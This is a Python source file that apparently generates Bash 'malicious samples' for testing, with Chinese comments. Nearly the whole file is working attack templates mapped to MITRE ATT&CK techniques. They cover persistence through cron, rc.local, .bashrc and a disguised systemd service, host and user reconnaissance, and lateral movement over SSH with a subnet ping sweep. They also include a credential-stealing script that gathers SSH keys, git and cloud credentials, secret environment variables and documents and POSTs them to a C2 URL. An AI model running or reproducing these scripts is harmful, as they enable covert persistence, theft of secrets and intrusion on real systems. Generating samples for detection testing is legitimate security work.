#!/usr/bin/env python3
"""
Bash 样本生成器 - Sample Generator v2.0

功能:
- Linux 持久化
- 网络侦察
- C2 通信
- 数据打包外传
- 横向移动
"""

from .base_generator import BaseGenerator


class BashGenerator(BaseGenerator):
    """Bash 恶意样本生成器"""
    
    ATTACK_TYPES = [
        'persistence',          # 持久化
        'reconnaissance',      # 侦察
        'c2_communication',    # C2 通信
        'data_exfil',          # 数据外传
        'lateral_movement',    # 横向移动
        'privilege_escalation', # 权限提升
    ]
    
    def __init__(self, config=None):
        super().__init__(language='bash', config=config)
    
    def _get_bash_templates(self) -> dict:
        """获取 Bash 模板"""
        return {
            'persistence': '''#!/bin/bash
# Persistence - Bash
# Generated by Sample Generator v2.0
# Attack Type: Persistence
# MITRE ATT&CK: T1053.003 (Cron)

SCRIPT_PATH="$(readlink -f "$0")"
SCRIPT_NAME="$(basename "$0")"

# 添加到 crontab
add_cron_persistence() {
    echo "[*] Adding cron persistence..."
    
    # 检查是否已存在
    if crontab -l 2>/dev/null | grep -q "$SCRIPT_PATH"; then
        echo "  Already in crontab"
        return
    fi
    
    # 添加 cron 任务 (每小时执行)
    (crontab -l 2>/dev/null; echo "0 * * * * $SCRIPT_PATH") | crontab -
    
    echo "  Cron job added: 0 * * * * $SCRIPT_PATH"
}

# 添加到 rc.local
add_rclocal_persistence() {
    echo "[*] Adding rc.local persistence..."
    
    if [ -f /etc/rc.local ]; then
        if ! grep -q "$SCRIPT_PATH" /etc/rc.local; then
            sed -i "s|exit 0|$SCRIPT_PATH\\nexit 0|" /etc/rc.local
            echo "  Added to /etc/rc.local"
        fi
    fi
}

# 添加到 systemd 服务
add_systemd_persistence() {
    echo "[*] Adding systemd persistence..."
    
    SERVICE_NAME="system-update-helper"
    SERVICE_FILE="/etc/systemd/system/${SERVICE_NAME}.service"
    
    cat > "$SERVICE_FILE" << EOF
[Unit]
Description=System Update Helper
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash $SCRIPT_PATH
Restart=always
RestartSec=60

[Install]
WantedBy=multi-user.target
EOF
    
    systemctl daemon-reload
    systemctl enable "$SERVICE_NAME"
    systemctl start "$SERVICE_NAME"
    
    echo "  Systemd service created: $SERVICE_NAME"
}

# 添加到 bashrc
add_bashrc_persistence() {
    echo "[*] Adding .bashrc persistence..."
    
    BASHRC="$HOME/.bashrc"
    
    if ! grep -q "$SCRIPT_PATH" "$BASHRC"; then
        echo "" >> "$BASHRC"
        echo "# System update check" >> "$BASHRC"
        echo "[ -f $SCRIPT_PATH ] && $SCRIPT_PATH &" >> "$BASHRC"
        echo "  Added to .bashrc"
    fi
}

# 检查持久化状态
check_persistence() {
    echo "[*] Checking persistence status..."
    
    echo "  Cron jobs:"
    crontab -l 2>/dev/null | grep -c "$SCRIPT_NAME" || echo "    0"
    
    echo "  Systemd services:"
    systemctl list-unit-files --type=service 2>/dev/null | grep -c "update-helper" || echo "    0"
    
    echo "  rc.local:"
    grep -c "$SCRIPT_NAME" /etc/rc.local 2>/dev/null || echo "    0"
}

# 主函数
main() {
    echo "============================================"
    echo "Persistence Module v2.0"
    echo "============================================"
    echo ""
    
    # 检查 root 权限
    if [ "$EUID" -eq 0 ]; then
        echo "[*] Running as root"
    else
        echo "[*] Running as regular user"
    fi
    echo ""
    
    add_cron_persistence
    echo ""
    
    add_bashrc_persistence
    echo ""
    
    if [ "$EUID" -eq 0 ]; then
        add_rclocal_persistence
        echo ""
        
        add_systemd_persistence
        echo ""
    fi
    
    check_persistence
    
    echo ""
    echo "============================================"
    echo "Persistence complete!"
    echo "============================================"
}

# 执行
main
''',
            
            'reconnaissance': '''#!/bin/bash
# Reconnaissance - Bash
# Generated by Sample Generator v2.0
# Attack Type: Reconnaissance
# MITRE ATT&CK: T1592 (Gather Victim Host Information)

OUTPUT_DIR="/tmp/recon_$(date +%Y%m%d_%H%M%S)"
mkdir -p "$OUTPUT_DIR"

echo "============================================"
echo "Reconnaissance Module v2.0"
echo "============================================"
echo ""

# 系统信息
collect_system_info() {
    echo "[*] Collecting system information..."
    
    {
        echo "=== Hostname ==="
        hostname
        
        echo -e "\\n=== OS Info ==="
        cat /etc/os-release 2>/dev/null || uname -a
        
        echo -e "\\n=== Kernel ==="
        uname -r
        
        echo -e "\\n=== Architecture ==="
        uname -m
        
        echo -e "\\n=== CPU ==="
        lscpu 2>/dev/null | grep -E "^(Model name|CPU\\(s\\))" || echo "N/A"
        
        echo -e "\\n=== Memory ==="
        free -h
        
        echo -e "\\n=== Disk ==="
        df -h / 2>/dev/null
    } > "$OUTPUT_DIR/system_info.txt"
    
    echo "  System info collected"
}

# 网络信息
collect_network_info() {
    echo "[*] Collecting network information..."
    
    {
        echo "=== IP Addresses ==="
        ip addr 2>/dev/null || ifconfig 2>/dev/null
        
        echo -e "\\n=== Routing Table ==="
        ip route 2>/dev/null || route -n
        
        echo -e "\\n=== DNS ==="
        cat /etc/resolv.conf
        
        echo -e "\\n=== ARP Table ==="
        arp -a 2>/dev/null || ip neigh
        
        echo -e "\\n=== Listening Ports ==="
        netstat -tlnp 2>/dev/null || ss -tlnp
        
        echo -e "\\n=== Active Connections ==="
        netstat -anp 2>/dev/null | grep ESTABLISHED || ss -anp | grep ESTAB
    } > "$OUTPUT_DIR/network_info.txt"
    
    echo "  Network info collected"
}

# 用户信息
collect_user_info() {
    echo "[*] Collecting user information..."
    
    {
        echo "=== Current User ==="
        whoami
        id
        
        echo -e "\\n=== Logged In Users ==="
        who
        
        echo -e "\\n=== Last Logins ==="
        last -10 2>/dev/null
        
        echo -e "\\n=== Users ==="
        cat /etc/passwd
        
        echo -e "\\n=== Groups ==="
        cat /etc/group
        
        echo -e "\\n=== Sudo Users ==="
        grep sudo /etc/group 2>/dev/null
    } > "$OUTPUT_DIR/user_info.txt"
    
    echo "  User info collected"
}

# 进程信息
collect_process_info() {
    echo "[*] Collecting process information..."
    
    {
        echo "=== Running Processes ==="
        ps aux 2>/dev/null || ps -ef
        
        echo -e "\\n=== Process Tree ==="
        pstree 2>/dev/null || ps auxf
        
        echo -e "\\n=== Top Processes ==="
        top -bn1 2>/dev/null | head -20
    } > "$OUTPUT_DIR/process_info.txt"
    
    echo "  Process info collected"
}

# 软件信息
collect_software_info() {
    echo "[*] Collecting installed software..."
    
    {
        echo "=== Installed Packages (Debian) ==="
        dpkg -l 2>/dev/null | head -50
        
        echo -e "\\n=== Installed Packages (RPM) ==="
        rpm -qa 2>/dev/null | head -50
        
        echo -e "\\n=== Python Packages ==="
        pip list 2>/dev/null | head -20
        
        echo -e "\\n=== Node.js Packages ==="
        npm list -g 2>/dev/null | head -20
    } > "$OUTPUT_DIR/software_info.txt"
    
    echo "  Software info collected"
}

# 打包数据
package_data() {
    echo "[*] Packaging data..."
    
    ARCHIVE="$OUTPUT_DIR.tar.gz"
    tar -czf "$ARCHIVE" "$OUTPUT_DIR" 2>/dev/null
    
    SIZE=$(du -h "$ARCHIVE" | cut -f1)
    echo "  Archive created: $ARCHIVE ($SIZE)"
    
    # 清理
    rm -rf "$OUTPUT_DIR"
}

# 主函数
main() {
    collect_system_info
    collect_network_info
    collect_user_info
    collect_process_info
    collect_software_info
    
    echo ""
    package_data
    
    echo ""
    echo "============================================"
    echo "Reconnaissance complete!"
    echo "============================================"
}

# 执行
main
''',
            
            'data_exfil': '''#!/bin/bash
# Data Exfiltration - Bash
# Generated by Sample Generator v2.0
# Attack Type: Data Exfiltration
# MITRE ATT&CK: T1041 (Exfiltration Over C2 Channel)

C2_URL="http://127.0.0.1:8080/collect"
OUTPUT_DIR="/tmp/exfil_$(date +%Y%m%d_%H%M%S)"
mkdir -p "$OUTPUT_DIR"

echo "============================================"
echo "Data Exfiltration Module v2.0"
echo "============================================"
echo ""

# 收集 SSH 密钥
collect_ssh_keys() {
    echo "[*] Collecting SSH keys..."
    
    SSH_DIR="$HOME/.ssh"
    if [ -d "$SSH_DIR" ]; then
        cp -r "$SSH_DIR" "$OUTPUT_DIR/ssh_keys/" 2>/dev/null
        echo "  SSH keys collected"
    else
        echo "  No SSH keys found"
    fi
}

# 收集 Git 凭据
collect_git_credentials() {
    echo "[*] Collecting Git credentials..."
    
    if [ -f "$HOME/.git-credentials" ]; then
        cp "$HOME/.git-credentials" "$OUTPUT_DIR/"
        echo "  Git credentials collected"
    fi
    
    if [ -f "$HOME/.gitconfig" ]; then
        cp "$HOME/.gitconfig" "$OUTPUT_DIR/"
        echo "  Git config collected"
    fi
}

# 收集云凭据
collect_cloud_credentials() {
    echo "[*] Collecting cloud credentials..."
    
    # AWS
    if [ -d "$HOME/.aws" ]; then
        cp -r "$HOME/.aws" "$OUTPUT_DIR/aws/" 2>/dev/null
        echo "  AWS credentials collected"
    fi
    
    # GCP
    if [ -d "$HOME/.config/gcloud" ]; then
        cp -r "$HOME/.config/gcloud" "$OUTPUT_DIR/gcp/" 2>/dev/null
        echo "  GCP credentials collected"
    fi
    
    # Azure
    if [ -d "$HOME/.azure" ]; then
        cp -r "$HOME/.azure" "$OUTPUT_DIR/azure/" 2>/dev/null
        echo "  Azure credentials collected"
    fi
}

# 收集文档
collect_documents() {
    echo "[*] Collecting documents..."
    
    DOCUMENT_DIRS=(
        "$HOME/Documents"
        "$HOME/Desktop"
        "$HOME/Downloads"
        "$HOME/projects"
    )
    
    for dir in "${DOCUMENT_DIRS[@]}"; do
        if [ -d "$dir" ]; then
            find "$dir" -type f \\( -name "*.doc*" -o -name "*.xls*" -o -name "*.ppt*" -o -name "*.pdf" -o -name "*.txt" \\) -exec cp {} "$OUTPUT_DIR/documents/" \\; 2>/dev/null
        fi
    done
    
    echo "  Documents collected"
}

# 收集环境变量
collect_env_vars() {
    echo "[*] Collecting environment variables..."
    
    env | grep -iE "(key|secret|password|token|credential|api_|auth_)" > "$OUTPUT_DIR/sensitive_env.txt" 2>/dev/null
    
    echo "  Environment variables collected"
}

# 打包数据
compress_data() {
    echo "[*] Compressing data..."
    
    ARCHIVE="$OUTPUT_DIR.tar.gz"
    tar -czf "$ARCHIVE" "$OUTPUT_DIR" 2>/dev/null
    
    SIZE=$(du -h "$ARCHIVE" | cut -f1)
    echo "  Archive: $ARCHIVE ($SIZE)"
}

# 外传到 C2
exfiltrate_to_c2() {
    echo "[*] Exfiltrating to C2..."
    echo "  C2 URL: $C2_URL"
    
    ARCHIVE="$OUTPUT_DIR.tar.gz"
    
    # 使用 curl
    if command -v curl &> /dev/null; then
        curl -X POST -F "file=@$ARCHIVE" "$C2_URL" 2>/dev/null
        if [ $? -eq 0 ]; then
            echo "  Exfiltration successful (curl)"
            return
        fi
    fi
    
    # 使用 wget
    if command -v wget &> /dev/null; then
        wget --post-file="$ARCHIVE" "$C2_URL" -O /dev/null 2>/dev/null
        if [ $? -eq 0 ]; then
            echo "  Exfiltration successful (wget)"
            return
        fi
    fi
    
    echo "  Exfiltration failed (expected in test)"
}

# 清理
cleanup() {
    echo "[*] Cleaning up..."
    rm -rf "$OUTPUT_DIR"
    rm -f "$OUTPUT_DIR.tar.gz"
    echo "  Cleanup complete"
}

# 主函数
main() {
    collect_ssh_keys
    collect_git_credentials
    collect_cloud_credentials
    collect_env_vars
    collect_documents
    
    echo ""
    compress_data
    exfiltrate_to_c2
    cleanup
    
    echo ""
    echo "============================================"
    echo "Exfiltration complete!"
    echo "============================================"
}

# 执行
main
''',
            
            'lateral_movement': '''#!/bin/bash
# Lateral Movement - Bash
# Generated by Sample Generator v2.0
# Attack Type: Lateral Movement
# MITRE ATT&CK: T1021 (Remote Services)

echo "============================================"
echo "Lateral Movement Module v2.0"
echo "============================================"
echo ""

# SSH 横向移动
ssh_lateral() {
    local target=$1
    local cmd=$2
    
    echo "[*] Attempting SSH to: $target"
    
    # 尝试免密登录
    ssh -o StrictHostKeyChecking=no -o ConnectTimeout=5 "$target" "$cmd" 2>/dev/null
    
    if [ $? -eq 0 ]; then
        echo "  SSH successful"
        return 0
    else
        echo "  SSH failed"
        return 1
    fi
}

# 扫描内网主机
scan_network() {
    echo "[*] Scanning network..."
    
    SUBNET="192.168.1"
    HOSTS=()
    
    for i in {1..254}; do
        IP="$SUBNET.$i"
        if ping -c 1 -W 1 "$IP" &>/dev/null; then
            HOSTS+=("$IP")
            echo "  Host found: $IP"
        fi
    done
    
    echo "  Total hosts: ${#HOSTS[@]}"
    echo "${HOSTS[@]}"
}

# 检查 SSH 信任关系
check_ssh_trust() {
    echo "[*] Checking SSH trust relationships..."
    
    if [ -f "$HOME/.ssh/known_hosts" ]; then
        echo "  Known hosts:"
        cut -d' ' -f1 "$HOME/.ssh/known_hosts" | head -10
    fi
    
    if [ -f "$HOME/.ssh/authorized_keys" ]; then
        echo "  Authorized keys: $(wc -l < "$HOME/.ssh/authorized_keys")"
    fi
}

# 主函数
main() {
    check_ssh_trust
    echo ""
    
    echo "[*] Scanning network (example: 192.168.1.0/24)..."
    echo "  (Skipping actual scan in test mode)"
    echo ""
    
    echo "[*] Lateral movement techniques available:"
    echo "  - SSH with stolen keys"
    echo "  - SSH with weak credentials"
    echo "  - WMI/WinRM (Windows)"
    echo "  - NFS/SMB shares"
    echo ""
    
    echo "============================================"
    echo "Lateral movement analysis complete!"
    echo "============================================"
}

# 执行
main
'''
        }
